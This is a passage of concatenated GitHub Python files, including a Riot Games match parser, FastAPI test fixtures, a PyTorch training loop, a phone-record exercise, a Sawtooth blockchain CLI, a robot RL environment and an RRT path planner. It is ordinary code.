Player\nfrom getLol.model.ParticipantIdentity import ParticipantIdentity\nfrom getLol.model.Ban import Ban\nfrom getLol.model.Equipe import Equipe\n\n\nclass Match:\n\n season = ''\n queue = ''\n id = ''\n identidadeParticipantes = []\n versao_jogo = ''\n id_plataforma = ''\n modo_jogo = ''\n id_mapa = ''\n tipo_jogo = ''\n equipes = []\n participantes = []\n duracao = ''\n criacao = ''\n mensagem = 200\n\n def __init__(self, conexao):\n self.conexao = conexao\n\n def getMatchById(self, id, regiao='br1'):\n url = 'https://' + regiao + '.api.riotgames.com/lol/match/v4/matches/' + id + '?api_key=' + self.conexao.key\n retorno = requests.get(url)\n\n if retorno.status_code == 200:\n resultado = retorno.json()\n\n self.season = resultado['seasonId']\n self.queue = resultado['queueId']\n self.id = resultado['gameId']\n identidadeParts = []\n\n for part in resultado['participantIdentities']:\n player = Player(\n part['player']['currentPlatformId'],\n part['player']['summonerName'],\n part['player']['matchHistoryUri'],\n part['player']['platformId'],\n part['player']['currentAccountId'],\n part['player']['profileIcon'],\n part['player']['summonerId'],\n part['player']['accountId']\n )\n participant_identity = ParticipantIdentity(player, part['participantId'])\n identidadeParts.append(participant_identity)\n self.identidadeParticipantes = identidadeParts\n self.versao_jogo = resultado['gameVersion']\n self.id_plataforma = resultado['platformId']\n self.modo_jogo = resultado['gameMode']\n self.id_mapa = resultado['mapId']\n self.tipo_jogo = resultado['gameType']\n\n equipes = []\n for equipe in resultado['teams']:\n bans = []\n for ban in equipe['bans']:\n ban_o = Ban(ban['pickTurn'], ban['championId'])\n bans.append(ban_o)\n eq = Equipe(equipe['firstDragon'], equipe['firstInhibitor'], bans, equipe['baronKills'],\n equipe['firstRiftHerald'], equipe['firstBaron'], equipe['riftHeraldKills'],\n equipe['firstBlood'], int(equipe['teamId']), equipe['firstTower'],\n equipe['vilemawKills'], equipe['inhibitorKills'], equipe['towerKills'],\n equipe['dominionVictoryScore'], equipe['win'], equipe['dragonKills'])\n equipes.append(eq)\n\n self.equipes = equipes\n\n self.participantes = resultado['participants']\n self.duracao = resultado['gameDuration']\n self.criacao = resultado['gameCreation']\n\n return self\n else:\n self.message = retorno.status_code\n return self\n","repo_name":"Erkmann/getLOL","sub_path":"getLol/model/Match.py","file_name":"Match.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16237807617","text":"import asyncio\nimport os\nfrom io import BytesIO\nfrom typing import AsyncGenerator, Generator\n\nimport pytest\nimport pytest_asyncio\nfrom fastapi import UploadFile\nfrom httpx import AsyncClient\nfrom sqlalchemy.ext.asyncio import AsyncConnection, AsyncSession, create_async_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom src import crud\nfrom src.api.deps import get_session\nfrom src.core.config import settings\nfrom src.db.base import Base\nfrom src.main import app\nfrom src.models import Twit, User\n\nengine = create_async_engine(\n settings.TEST_SQLALCHEMY_DATABASE_URI, echo=False # type: ignore\n)\nsession = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)\n\n\nUSER_API_KEY = 'test11'\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop() -> Generator:\n \"\"\"\n Creates an instance of the default event loop for the test session.\n \"\"\"\n loop = asyncio.new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest_asyncio.fixture\nasync def db_setup() -> AsyncGenerator:\n \"\"\"\n Create database models and drop after test session\n :return:\n \"\"\"\n try:\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.create_all)\n await init_fixture_database()\n yield\n finally:\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.drop_all)\n\n\n@pytest_asyncio.fixture\nasync def db(db_setup: AsyncConnection) -> AsyncGenerator:\n \"\"\"\n Create session before every test and rollback changes of this session at the end.\n \"\"\"\n async with session() as sess:\n yield sess\n await sess.rollback()\n\n\n@pytest_asyncio.fixture(scope=\"module\")\nasync def client() -> AsyncGenerator:\n async with AsyncClient(app=app, base_url='http://localhost') as c:\n yield c\n\n\nasync def override_get_db():\n async with session() as sess:\n yield sess\n\n\nasync def init_fixture_database() -> None:\n async with session() as sess:\n async with sess.begin():\n user = User(name='Fix', key=USER_API_KEY)\n twit = Twit(tweet_data='text', user_id=1)\n sess.add_all([user, twit])\n await sess.commit()\n\n\n@pytest.fixture\ndef user_api_key() -> dict:\n return {'api-key': USER_API_KEY}\n\n\n@pytest.fixture\ndef file_fixture(request):\n name = request.param\n file_name = '%s%s' % (settings.MEDIA_ROOT, name)\n open(file_name, 'w').close()\n yield name\n os.remove(file_name)\n\n\n@pytest_asyncio.fixture\nasync def uploaded_file():\n filename = 'asdfjhasdfk.jpeg'\n yield UploadFile(filename, BytesIO(b'binary_data'), content_type='image/jpeg')\n os.remove(os.path.join(settings.MEDIA_ROOT, filename))\n\n\n@pytest_asyncio.fixture\nasync def twit_with_media():\n from src.tests.factories import MediaFactory, TwitFactory\n\n media = await MediaFactory.create()\n twit = TwitFactory.build()\n obj_in = twit.to_json()\n obj_in.pop('user_id')\n obj_in['tweet_media_ids'] = [media.id]\n return obj_in\n\n\n@pytest_asyncio.fixture\nasync def users_twits():\n from src.tests.factories import FollowFactory, TwitFactory, UserFactory\n\n user_1 = await UserFactory.create()\n user_2 = await UserFactory.create()\n user_3 = await UserFactory.create()\n await TwitFactory.create(user=user_1)\n await TwitFactory.create(user=user_1)\n await TwitFactory.create(user=user_2)\n await TwitFactory.create(user=user_3)\n await FollowFactory.create(follower=user_2, following=user_1)\n await FollowFactory.create(follower=user_1, following=user_2)\n await FollowFactory.create(follower=user_3, following=user_2)\n return user_1, user_2\n\n\n@pytest_asyncio.fixture\nasync def user_info(db):\n from src.tests.factories import UserFactory\n\n user = await UserFactory.create()\n follower = await UserFactory.create()\n following = await UserFactory.create()\n following_2 = await UserFactory.create()\n await crud.follow.follow_user(\n db, follower_user_id=follower.id, following_user_id=user.id\n )\n await crud.follow.follow_user(\n db, follower_user_id=user.id, following_user_id=following.id\n )\n await crud.follow.follow_user(\n db, follower_user_id=user.id, following_user_id=following_2.id\n )\n json_response = {\n 'result': True,\n 'user': {\n 'name': user.name,\n 'id': user.id,\n 'followers': [\n {'name': follower.name, 'id': follower.id},\n ],\n 'following': [\n {'name': following.name, 'id': following.id},\n {'name': following_2.name, 'id': following_2.id},\n ],\n },\n }\n return user, follower, following, following_2, json_response\n\n\napp.dependency_overrides[get_session] = override_get_db\n","repo_name":"ksayer/twitter_fastapi","sub_path":"src/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24596495725","text":"import torch\nfrom tqdm import tqdm\ndef train_model(model,optimizer,epochs,criterion,trainloader,validation_loader=None,device='cuda',checkpoint=None):\n \"\"\"\n\n Args:\n model(nn.Module):\n optimizer(nn.optim):\n criterion(nn.CrossEntropy)\n trainloader(torch.utils.data.Dataloader):\n validation_loader(torch.utils.data.Dataloader):\n device(torch.device):\n checkpoint(str): \n \"\"\" \n if checkpoint is not None:\n state_dict = torch.load(checkpoint)\n model.load_state_dict(state_dict)\n print('Starting training from checkpoint')\n #check how to load optimizer in checkpoint\n #Implement that later\n for epoch in tqdm(range(epochs)):\n \n model.train()\n running_loss = 0.0\n total = 0\n correct = 0.0\n for idx , mini_batch in tqdm(enumerate(trainloader)):\n imgs , labels = mini_batch\n imgs = imgs.to(device)\n labels = labels.to(device)\n labels = labels.long()\n output = model(imgs)\n _ , preds = torch.max(output,1)\n optimizer.zero_grad()\n loss = criterion(output,labels)\n loss.backward()\n optimizer.step()\n running_loss +=loss.item()\n total += labels.size(0)\n correct += (preds == labels).sum().item()\n\n print(f'Train: Epoch:{epoch} Loss:{running_loss / total} Accuracy:{100 * correct / total }')\n\n model.eval()\n eval_loss = 0.0\n eval_correct = 0.0\n total = 0\n correct = 0.0\n for idx , mini_batches in tqdm(enumerate(validation_loader)):\n imgs , labels = mini_batches\n imgs = imgs.to(device)\n labels = labels.to(device).long()\n output = model(imgs)\n _ , preds = torch.max(output,1)\n loss = criterion(output,labels)\n eval_loss += loss.item()\n correct += (preds == labels).sum().item()\n total += labels.size(0)\n \n print(f'Test: Epoch:{epoch} Loss:{eval_loss / total}, Eval_Accuracy{100* correct/ total}')\n \n if(epoch%5==0):\n torch.save(model.state_dict(),f'model{epoch}.pth')\n\n return model","repo_name":"UsamaHasan/DistractedDriverClassification","sub_path":"src/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12850013456","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\n\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 3:\n(080) is the area code for fixed line telephones in Bangalore.\nFixed line numbers include parentheses, so Bangalore numbers\nhave the form (080)xxxxxxx.)\n\nPart A: Find all of the area codes and mobile prefixes called by people\nin Bangalore.\n - Fixed lines start with an area code enclosed in brackets. The area\n codes vary in length but always begin with 0.\n - Mobile numbers have no parentheses, but have a space in the middle\n of the number to help readability. The prefix of a mobile number\n is its first four digits, and they always start with 7, 8 or 9.\n - Telemarketers' numbers have no parentheses or space, but they start\n with the area code 140.\n\nPrint the answer as part of a message:\n\"The numbers called by people in Bangalore have codes:\"\n \nThe list of codes should be print out one per line in lexicographic order with no duplicates.\n\nPart B: What percentage of calls from fixed lines in Bangalore are made\nto fixed lines also in Bangalore? In other words, of all the calls made\nfrom a number starting with \"(080)\", what percentage of these calls\nwere made to a number also starting with \"(080)\"?\n\nPrint the answer as a part of a message::\n\" percent of calls from fixed lines in Bangalore are calls\nto other fixed lines in Bangalore.\"\nThe percentage should have 2 decimal digits\n\"\"\"\n\ndef get_unique_numbers_called_by_area_code(area_code, calls):\n \"\"\"\n This function returns a list of area codes called by an specific area code.\n\n INPUT:\n area_code: the area code where we want to filter the list\n calls: the list of calls\n\n RETURN: a list of numbers called by an specific area code.\n \"\"\"\n\n # I have chosen set as my data collection because for this problem the order doesn't matter. Set holds unique hashable object like strings.\n # Creating the set - O(1)\n called_numbers = set()\n \n # the index for iterating the list of calls. It starts on 0 - O(1)\n index = 0\n\n # iterating over the list of calls - O(n)\n # this has a complexity of O(n), because it is iterating over the whole list.\n while index < len(calls):\n # compare if the caller number starts with the area code - O(1)\n if calls[index][0].startswith(area_code):\n # if the caller number starts with the area code, then the reciever number is add to the set - O(4)\n # Also, the filter_area_codes function is calledx to filter just the area code of the receiver number. \n called_numbers.add(filter_area_codes(calls[index][1]))\n \n # increasing the index by 1 - O(1)\n index += 1\n\n # returning a list of area codes based on the set - O(1)\n return list(called_numbers)\n\ndef get_number_of_calls_from_area_code(area_code, calls):\n \"\"\"\n This function returns the number of calls from a specific area code.\n\n INPUT:\n area_code: the area code where we want to filter the list\n calls: the list of calls\n\n RETURN: the number of calls\n \"\"\"\n # the index for iterating the list of calls. It starts on 0 - O(1)\n index = 0\n # the number of calls, in this case starts with 0 - O(1)\n number_of_calls = 0\n\n # iterating over the list of calls - O(n)\n # this has a complexity of O(n), because it is iterating over the whole list.\n while index < len(calls):\n # compare if the caller number starts with the area code - O(1)\n if calls[index][0].startswith(area_code):\n # if the caller number starts with the area code, then the number of calls is icreased - O(4)\n number_of_calls += 1\n \n # increasing the index by 1 - O(1)\n index += 1\n\n # returning a list of area codes based on the set - O(1)\n return number_of_calls\n\ndef filter_area_codes(number):\n \"\"\"\n This function returns the area core of a given phone number.\n\n INPUT:\n number: a phone number. \n\n RETURN: the area code if it's a velid phone number.\n \"\"\"\n # True in case the phone number starts with ( - O(1)\n if number.startswith('('):\n # returns the area code - O(1)\n return number[:number.find(')')+1]\n # True in case the phone number has a space in the middle - O(1)\n elif number.find(' ') > 0:\n # True in case the phone number starts with 7 or 8 or 9 - O(1)\n if number.startswith('7') or number.startswith('8') or number.startswith('9'): \n # returns the area code - O(1)\n return number[:4]\n # True if none of above - O(1)\n else:\n # returns an error.\n return \"Invalid phone number\"\n \ndef print_lex_ordered_numbers(numbers):\n \"\"\"\n This function sorts a list of numbers in lexicographic order and prints each number.\n\n INPUT: \n numbers: a list of numbers. \n\n RETURN: None, this function doesn't return anything.\n \"\"\"\n # sorting the list in lexicographic order - O(nlogn)\n # this has a complexity of O(nlogn), because it is iterating over the whole list.\n numbers.sort()\n # iterating the list to print the ordered numbers - O(1)\n for number in numbers:\n print(number)\n\ndef get_numbers_called_by_same_area_code(area_code, calls):\n \"\"\"\n This function iterates a list of calls and fill a list with the numbers that match the area codes.\n\n INPUT: \n area_code: the area code that filters the list. \n calls: a list of numbers. \n\n RETURN: the len of the list of numbers that called other numbers with the same area code.\n \"\"\"\n # creating a list to store unique numbers - O(1)\n called_numbers = list()\n # starting the index with 0 - O(1)\n index = 0\n # iterating over the calls - O(n)\n while index < len(calls):\n # compare if the caller number starts with the area code - O(1)\n if calls[index][0].startswith(area_code) and calls[index][1].startswith(area_code):\n # adding the caller number to the list - O(1)\n called_numbers.append(calls[index][0])\n # incrementing the index by 1 - O(1)\n index += 1\n \n # returning the length of the called numbers - O(1)\n return len(called_numbers)\n\ndef get_percentage_from_fixed_lines(number_of_calls_from_Bangalore, number_of_calls_from_Bangalore_to_Bangalore):\n \"\"\"\n This function gets the percentage of calls from fixed lines in Bangalore are made \n to fixed lines also in Bangalore\n\n INPUT: # getting the percentage. - O(1)\n number_# getting the percentage. - O(1)of calls from fixed lines in Bangalore. \n number_# getting the percentage. - O(1)lore: number of calls from fixed lines in Bangalore to \n # getting the percentage. - O(1) fixed lines in Bagalore. \n\n RETURN:# getting the percentage. - O(1)xed lines in Bangalore are made \n # getting the percentage. - O(1)e\n \"\"\"\n # getting the percentage. - O(1)\n return (number_of_calls_from_Bangalore_to_Bangalore * 100) / number_of_calls_from_Bangalore\n\ndef main():\n # Part A solution\n # defining the area code from Bangalore. - O(1)\n area_code = \"(080)\"\n\n # printing the solution message. - O(1)\n print(\"The numbers called by people in Bangalore have codes:\")\n\n # getting all of the area codes and mobile prefixes called by people in Bangalore. - O(n)\n unique_numbers_from_Bangalore = get_unique_numbers_called_by_area_code(area_code, calls)\n \n # ordering and printing the list of calls from Bangalore. - O(nlogn)\n print_lex_ordered_numbers(unique_numbers_from_Bangalore)\n\n \n # Part B solution\n # getting the numbers of calls from bangalore - O(n)\n number_of_calls_from_bangalore = get_number_of_calls_from_area_code(area_code, calls)\n\n # getting the number of calls from fixed lines in Bangalore to other fixed lines in Bangalore - O(n)\n number_of_calls_from_Bangalore_to_Bangalore = get_numbers_called_by_same_area_code(area_code, calls)\n\n # calculating the percentage from fixed lines in Bangalore are calls to other fixed lines in Bangalore - O(1)\n percentage = get_percentage_from_fixed_lines(number_of_calls_from_bangalore, number_of_calls_from_Bangalore_to_Bangalore)\n \n # printing the solution message\n print(\"{:.2f}% percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\"\n .format(percentage))\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n'''\n# UNIT TESTING\n# get_numbers_called_by_area_code test\n# four numbers with one caller from Bangalore\ncalls_test_list1 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list1) == [\"98440 65896\"])\n# four numbers with two callers from Bangalore\ncalls_test_list2 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"98445 71741\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list2) == [\"98445 71741\", \"98440 65896\"])\n# six numbers with three callers in Bangalore and two are duplicated\ncalls_test_list3 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"98445 71741\"],\n [\"78130 00821\", \"98453 94494\"], [\"(080)23802940\", \"90352 50054\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list3) == [\"90352 50054\", \"98445 71741\", \"98440 65896\"])\n# six numbers with three callers from Bangalore and two receivers are duplicated\ncalls_test_list4 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"98445 71741\"],\n [\"78130 00821\", \"98453 94494\"], [\"(080)67362492\", \"98440 65896\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list4) == [\"98445 71741\", \"98440 65896\"])\n# four numbers with none caller from Bangalore\ncalls_test_list5 = [[\"98440 65896\", \"(080)47459867\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\n#assert(get_numbers_called_by_area_code(\"(080)\", calls_test_list5) == [])\nprint(\"test for get_numbers_called_by_area_code passed\")\n\n# print_lex_ordered_numbers test\n# test with eigth numbers on the list\norder_test_list1 = [\"(080)set47459867\", \"98440 65896\", \"90087 42537\", \"(080)35121497\", \n \"(044)set30727085\", \"92414get_numbers_called_by_area_code 22596\", \"97447 92655\", \"(022)39006198\"]\nprint_lex_ordered_numbers(order_test_list1)\nprint(\"test for print_lex_setordered_numbers passed\")\n\n# get_numbers_called_by_sasetme_area_code test\n# test with eigth numbers on the list two callers from Bangalore and one receiver from Bancalore\nbangalore_calls_test_list1 = [[\"(080)47459867\", \"98440 65896\"], [\"90087 42537\", \"(0471)6537077\"], \n [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"(080)35121497\"],\n [\"78130 00821\", \"98453 94494\"], [\"98453 46196\", \"90352 50054\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list1) == 1)\n# test with eigth numbers on the list two callers from Bangalore and two receivers from Bangalore\nbangalore_calls_test_list2 = [[\"(080)64765396\", \"(080)47459867\"], [\"90087 42537\", \"(0471)6537077\"], \n [\"(044)30727085\", \"92414 22596\"], [\"(080)23802940\", \"(080)35121497\"],\n [\"78130 00821\", \"98453 94494\"], [\"98453 46196\", \"90352 50054\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list2) == 2)\n# four numbers with none caller from Bangalore\nbangalore_calls_test_list3 = [[\"98440 65896\", \"(080)47459867\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list3) == 0)\n# four numbers with none caller from Bangalore \nbangalore_calls_test_list3 = [[\"98440 65896\", \"(080)47459867\"], [\"90087 42537\", \"(080)35121497\"], \n [\"(044)30727085\", \"92414 22596\"], [\"97447 92655\", \"(022)39006198\"]]\nassert(get_numbers_called_by_same_area_code(\"(080)\", bangalore_calls_test_list3) == 0)\nprint(\"test for get_numbers_called_by_same_area_code passed\")\n\n# test filter_area_codes\n# test with a fixed number\nassert(filter_area_codes(\"(044)30727085\") == \"(044)\")\n# test with a celphone\nassert(filter_area_codes(\"98440 65896\") == \"9844\")\n# test with a telemarketing number\nassert(filter_area_codes(\"1409994233\") == \"Invalid phone number\")\nprint(\"test for filter_area_codes passed\")\n\n# test get_percentage_from_fixed_lines\nassert(get_percentage_from_fixed_lines(8, 4) == 50)\nassert(get_percentage_from_fixed_lines(10, 2) == 20)\nassert(get_percentage_from_fixed_lines(10, 3) == 30)\nassert(get_percentage_from_fixed_lines(10, 0) == 0)\nprint(\"test for get_percentage_from_fixed_lines passed\")\n'''","repo_name":"marcotello/PythonPractices","sub_path":"P0/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":13256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41045315707","text":"#!/bin/python3\nfrom sesame_query import SesameQuery\n\n# Instantiate the SesameQuery class\nmyquery = SesameQuery()\n\n# Search for the object \"sigma oct\"\nresult = myquery.search(\"HD-123\")\n\n# Print the complete results\nfor key, value in result.items():\n print(f\"{key}: {value}\")\n","repo_name":"barbierimauro/AstronomerHelper","sub_path":"CDSaddons/example_sesame.py","file_name":"example_sesame.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19982470449","text":"import argparse\nimport getpass\nimport logging\nimport os\nimport sys\nimport traceback\nimport pkg_resources\n\nfrom colorlog import ColoredFormatter\n\nfrom api.client import AirAnchorClient, AirAnchorQueryClient\n\n\nDISTRIBUTION_NAME = 'AirAnchor-api'\n\nDEFAULT_SAWTOOTH = 'http://127.0.0.1:8008'\nDEFAULT_RABBITMQ = \"http://127.0.0.1:8654\"\n\n\ndef create_console_handler(verbose_level):\n clog = logging.StreamHandler()\n formatter = ColoredFormatter(\n \"%(log_color)s[%(asctime)s %(levelname)-8s%(module)s]%(reset)s \"\n \"%(white)s%(message)s\",\n datefmt=\"%H:%M:%S\",\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n })\n\n clog.setFormatter(formatter)\n\n if verbose_level == 0:\n clog.setLevel(logging.WARN)\n elif verbose_level == 1:\n clog.setLevel(logging.INFO)\n else:\n clog.setLevel(logging.DEBUG)\n\n return clog\n\n\ndef setup_loggers(verbose_level):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n logger.addHandler(create_console_handler(verbose_level))\n\n\ndef create_parent_parser(prog_name):\n parent_parser = argparse.ArgumentParser(prog=prog_name, add_help=False)\n parent_parser.add_argument(\n '-v', '--verbose',\n action='count',\n help='enable more verbose output')\n \n parent_parser.add_argument(\n '--priv-key',\n type=str,\n help='private key path'\n )\n\n try:\n version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version\n except pkg_resources.DistributionNotFound:\n version = 'UNKNOWN'\n\n parent_parser.add_argument(\n '-V', '--version',\n action='version',\n version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')\n .format(version),\n help='display version information')\n\n return parent_parser\n\n\ndef create_parser(prog_name):\n parent_parser = create_parent_parser(prog_name)\n\n parser = argparse.ArgumentParser(\n parents=[parent_parser],\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n subparsers = parser.add_subparsers(title='subcommands', dest='command')\n\n add_set_parser(subparsers, parent_parser)\n add_show_parser(subparsers, parent_parser)\n add_list_parser(subparsers, parent_parser)\n\n return parser\n\n\ndef add_set_parser(subparsers, parent_parser):\n message = 'Sends an intkey transaction to set to .'\n\n parser = subparsers.add_parser(\n 'set',\n parents=[parent_parser],\n description=message,\n help='Sends registration petition to store in the blockchain')\n\n parser.add_argument(\n 'data',\n type=str,\n help='data as plain text to register')\n \n parser.add_argument(\n '--rabbitmq',\n type=str,\n default=DEFAULT_RABBITMQ,\n help='specify URL of rabbimq' \n )\n\n\ndef do_set(args):\n data, rabbitmq_url, key_file = args.data, args.rabbitmq, args.priv_key\n \n client = AirAnchorClient(\n rabbitmq_url=rabbitmq_url,\n priv_path=key_file)\n \n result = client.do_location(data)\n print(result)\n\n\ndef add_show_parser(subparsers, parent_parser):\n message = 'Shows the data stored for a specific and .'\n\n parser = subparsers.add_parser(\n 'show',\n parents=[parent_parser],\n description=message,\n help='Displays the specified data linked to a key and hash')\n \n parser.add_argument(\n 'key',\n type=str,\n help='public key of the client that sent the transaction')\n\n parser.add_argument(\n 'hash',\n type=str,\n help='the hash of the transaction')\n \n parser.add_argument(\n '--url',\n type=str,\n default=DEFAULT_SAWTOOTH,\n help='specify URL of REST API')\n\n\ndef do_show(args):\n key, hash, url = args.key, args.hash, args.url\n \n client = AirAnchorQueryClient(url)\n \n value = client.do_show(key, hash)\n \n print('{}: {}'.format(hash, value))\n\n\ndef add_list_parser(subparsers, parent_parser):\n message = 'Shows the values of all keys in intkey state.'\n\n parser = subparsers.add_parser(\n 'list',\n parents=[parent_parser],\n description=message,\n help='Displays all data stored by a client')\n\n parser.add_argument(\n 'key',\n type=str,\n help='public key of the client to look up for')\n \n parser.add_argument(\n '--url',\n type=str,\n default=DEFAULT_SAWTOOTH,\n help='specify URL of REST API')\n\n\ndef do_list(args):\n key, url = args.key, args.url\n \n client = AirAnchorQueryClient(url)\n \n results = client.do_list(key)\n \n for pair in results:\n for name, value in pair.items():\n print('{}: {}'.format(name, value))\n\n\ndef main(prog_name=os.path.basename(sys.argv[0]), args=None):\n if args is None:\n args = sys.argv[1:]\n parser = create_parser(prog_name)\n args = parser.parse_args(args)\n\n if args.verbose is None:\n verbose_level = 0\n else:\n verbose_level = args.verbose\n setup_loggers(verbose_level=verbose_level)\n\n if not args.command:\n parser.print_help()\n sys.exit(1)\n \n commands = {\n 'set': do_set,\n 'show': do_show,\n 'list': do_list\n }\n\n commands[args.command](args)\n\n\ndef main_wrapper():\n # pylint: disable=bare-except\n try:\n main()\n except Exception as err:\n print(\"Error: {}\".format(err), file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n sys.exit(1)\n except KeyboardInterrupt:\n pass\n except SystemExit as e:\n raise e\n except:\n traceback.print_exc(file=sys.stderr)\n sys.exit(1)","repo_name":"divios/AirAnchor-API","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"932006117","text":"import sys\nfrom pathlib import Path\n\nimport numpy as np\nimport pybullet as p\nimport pybullet_data as pd\nimport pybullet_utils.bullet_client as bc\nfrom gym import spaces\n\nsys.path.append(str(Path(__file__).resolve().parents[0]))\nfrom environment import Environment\n\nsys.path.append(str(Path(__file__).resolve().parents[1]))\ntry:\n from .environments_robot_task.robots import get_robot\n from .environments_robot_task.tasks import get_task\nexcept:\n from environments_robot_task.robots import get_robot\n from environments_robot_task.tasks import get_task\n\nclass EnvironmentRobotTask(Environment):\n \"\"\"\n A class to combine a robot instance with a task instance\n to define a RL environment\n \"\"\"\n def __init__(self, robot_config, task_config, render=False,\n bullet_client=None, **kwargs):\n self.render = render\n\n self.task_config = task_config\n self.robot_config = robot_config\n\n if bullet_client is None:\n connection_mode = p.GUI if render else p.DIRECT\n\n bullet_client = bc.BulletClient(connection_mode)\n\n bullet_client.setAdditionalSearchPath(pd.getDataPath())\n\n time_step = 1. / 300.\n bullet_client.setTimeStep(time_step)\n bullet_client.setRealTimeSimulation(0)\n\n self.bullet_client = bullet_client\n\n self.task = get_task(task_config, self.bullet_client)\n\n self.robot = get_robot(robot_config, self.bullet_client)\n\n self.action_space = spaces.flatten_space(self.robot.action_space)\n\n self.state_space = spaces.Dict({\n 'robot': self.robot.state_space,\n 'task': self.task.state_space,\n })\n\n self.goal_space = self.task.goal_space\n\n self.reward_function = self.task.reward_function\n self.success_criterion = self.task.success_criterion\n\n def __del__(self):\n del self.robot\n del self.task\n\n def reset(self, desired_state=None, desired_goal=None):\n \"\"\"\n Reset the environment and return new state\n \"\"\"\n\n if desired_state is None:\n desired_state = {}\n\n state_robot = self.robot.reset(desired_state.get(\"robot\"))\n state_task, goal, info = self.task.reset(desired_state.get(\"task\"), desired_goal, self.robot, state_robot)\n\n state = {\n 'robot': state_robot,\n 'task': state_task\n }\n\n return state, goal, info\n\n def step(self, action):\n action = spaces.unflatten(self.robot.action_space, action)\n\n state_robot = self.robot.step(action)\n state_task, goal, done, info = self.task.step(state_robot, self.robot)\n\n state = {\n 'robot': state_robot,\n 'task': state_task\n }\n\n return state, goal, done, info\n","repo_name":"tmdt-buw/karolos","sub_path":"karolos/environments/environment_robot_task.py","file_name":"environment_robot_task.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"34061863376","text":"import random\n\nimport numpy as np\n\nfrom src.rrt.tree import Tree\nfrom src.utilities.geometry import steer\n\n\nclass RRTBase(object):\n def __init__(self, X, Q, x_init, x_goal, max_samples, r, prc=0.01):\n \"\"\"\n Template RRT planner\n :param X: Search Space\n :param Q: list of lengths of edges added to tree\n :param x_init: tuple, initial location\n :param x_goal: tuple, goal location\n :param max_samples: max number of samples to take\n :param r: resolution of points to sample along edge when checking for collisions\n :param prc: probability of checking whether there is a solution\n \"\"\"\n self.X = X\n self.samples_taken = 0\n self.max_samples = max_samples\n self.Q = Q\n self.r = r\n self.prc = prc\n self.x_init = x_init\n self.x_goal = x_goal\n self.trees = [] # list of all trees\n self.add_tree() # add initial tree\n\n def add_tree(self):\n \"\"\"\n Create an empty tree and add to trees\n \"\"\"\n self.trees.append(Tree(self.X))\n\n def add_vertex(self, tree, v):\n \"\"\"\n Add vertex to corresponding tree\n :param tree: int, tree to which to add vertex\n :param v: tuple, vertex to add\n \"\"\"\n self.trees[tree].V.insert(0, v + v, v)\n self.trees[tree].V_count += 1 # increment number of vertices in tree\n self.samples_taken += 1 # increment number of samples taken\n\n def add_edge(self, tree, child, parent):\n \"\"\"\n Add edge to corresponding tree\n :param tree: int, tree to which to add vertex\n :param child: tuple, child vertex\n :param parent: tuple, parent vertex\n \"\"\"\n self.trees[tree].E[child] = parent\n\n def nearby(self, tree, x, n):\n \"\"\"\n Return nearby vertices\n :param tree: int, tree being searched\n :param x: tuple, vertex around which searching\n :param n: int, max number of neighbors to return\n 